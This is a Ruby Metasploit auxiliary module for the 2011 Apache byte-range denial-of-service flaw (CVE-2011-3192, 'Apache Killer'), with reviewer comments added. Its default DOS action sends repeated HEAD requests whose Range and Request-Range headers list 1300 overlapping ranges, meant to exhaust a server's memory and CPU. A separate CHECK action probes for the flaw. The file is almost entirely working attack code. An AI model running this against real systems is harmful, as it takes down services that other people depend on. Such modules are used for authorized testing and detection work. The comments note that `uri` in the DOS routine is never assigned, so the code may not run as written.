##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2011-3192 ("Apache Killer"): sends HEAD requests
# whose Range / Request-Range headers list many overlapping byte ranges.
# Two actions are registered: CHECK (one probe request, reports a note) and
# DOS (RLIMIT requests, each carrying 1300 overlapping ranges).
#
# Detection note: the observable on the wire is a Range (and Request-Range)
# header with a long list of overlapping "5-N" ranges, as built in conduct_dos.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Dos

  # Registers module metadata, the DOS/CHECK actions and the options
  # RPORT (default 80), URI (default '/') and RLIMIT (default 50 requests).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Range Header DoS (Apache Killer)',
        'Description' => %q{
          The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x
          through 2.2.19 allows remote attackers to cause a denial of service (memory and
          CPU consumption) via a Range header that expresses multiple overlapping ranges,
          exploit called "Apache Killer".
        },
        'Author' => [
          'Kingcope', # original discovery
          'Masashi Fujiwara', # metasploit module
          'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          ['DOS', { 'Description' => 'Trigger Denial of Service against target' }],
          ['CHECK', { 'Description' => 'Check if target is vulnerable' }]
        ],
        'DefaultAction' => 'DOS',
        'References' => [
          [ 'BID', '49303'],
          [ 'CVE', '2011-3192'],
          [ 'EDB', '17696'],
          [ 'OSVDB', '74721' ],
        ],
        'DisclosureDate' => '2011-08-19',
        'Notes' => {
          'AKA' => ['Apache Killer'],
          # The DOS action is expected to take the service down.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URI', [ true, 'The request URI', '/']),
        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])
      ]
    )
  end

  # Scanner entry point: dispatches on the selected action name.
  # Any action other than 'DOS' / 'CHECK' does nothing.
  def run_host(_ip)
    case action.name
    when 'DOS'
      conduct_dos

    when 'CHECK'
      check_for_dos
    end
  end

  # CHECK action: sends one HEAD request with a short list of overlapping
  # ranges and treats an HTTP 206 reply as the vulnerable case, recording an
  # 'apache.killer' note for the host. Connection-level errors are only
  # reported verbosely.
  def check_for_dos
    uri = datastore['URI']
    rhost = datastore['RHOST']
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'HEAD',
      'headers' => {
        'HOST' => rhost,
        # Same overlapping-range list in both headers (Request-Range is the
        # legacy spelling honoured by older servers — TODO confirm).
        'Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10',
        'Request-Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10'
      }
    })

    # NOTE(review): a 206 only shows the server honoured the overlapping
    # ranges; whether that alone separates vulnerable from fixed builds is
    # assumed here — confirm against a patched server before trusting the note.
    if res && res.code == 206
      print_status("Response was #{res.code}")
      print_status("Found Byte-Range Header DOS at #{uri}")

      report_note(
        :host => rhost,
        :port => rport,
        :type => 'apache.killer',
        :data => { :uri => uri }
      )

    else
      print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")
    end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
    vprint_error(e.message)
  end

  # DOS action: sends RLIMIT HEAD requests, each with 1300 overlapping
  # ranges ("0-" followed by ",5-0" .. ",5-1299") in Range and Request-Range.
  # A connection reset from the peer is reported as success; other transport
  # errors are printed and the loop continues with the next request.
  def conduct_dos
    # NOTE(review): the datastore['URI'] read below is never assigned, so the
    # 'uri' key further down refers to a bare `uri` call rather than a local
    # variable — confirm that such a method is in scope before relying on it.
    datastore['URI']
    rhost = datastore['RHOST']
    ranges = ''

    # Build the overlapping range list once; it is reused for every request.
    for i in (0..1299) do
      ranges += ',5-' + i.to_s
    end

    for x in 1..datastore['RLIMIT']
      begin
        print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
        # Second argument is the per-request timeout (1 second); the response
        # itself is not inspected.
        _res = send_request_cgi(
          {
            'uri' => uri,
            'method' => 'HEAD',
            'headers' => {
              'HOST' => rhost,
              'Range' => "bytes=0-#{ranges}",
              'Request-Range' => "bytes=0-#{ranges}"
            }
          },
          1
        )
      rescue ::Rex::ConnectionRefused
        print_error("Unable to connect to #{rhost}:#{rport}")
      rescue ::Errno::ECONNRESET
        # Only an indirect signal: the peer may reset for reasons unrelated
        # to resource exhaustion — TODO confirm before treating as conclusive.
        print_good("DoS packet successful. #{rhost} not responding.")
      rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
        print_error("Couldn't connect to #{rhost}:#{rport}")
      rescue ::Timeout::Error, ::Errno::EPIPE => e
        vprint_error(e.message)
      end
    end
  end
end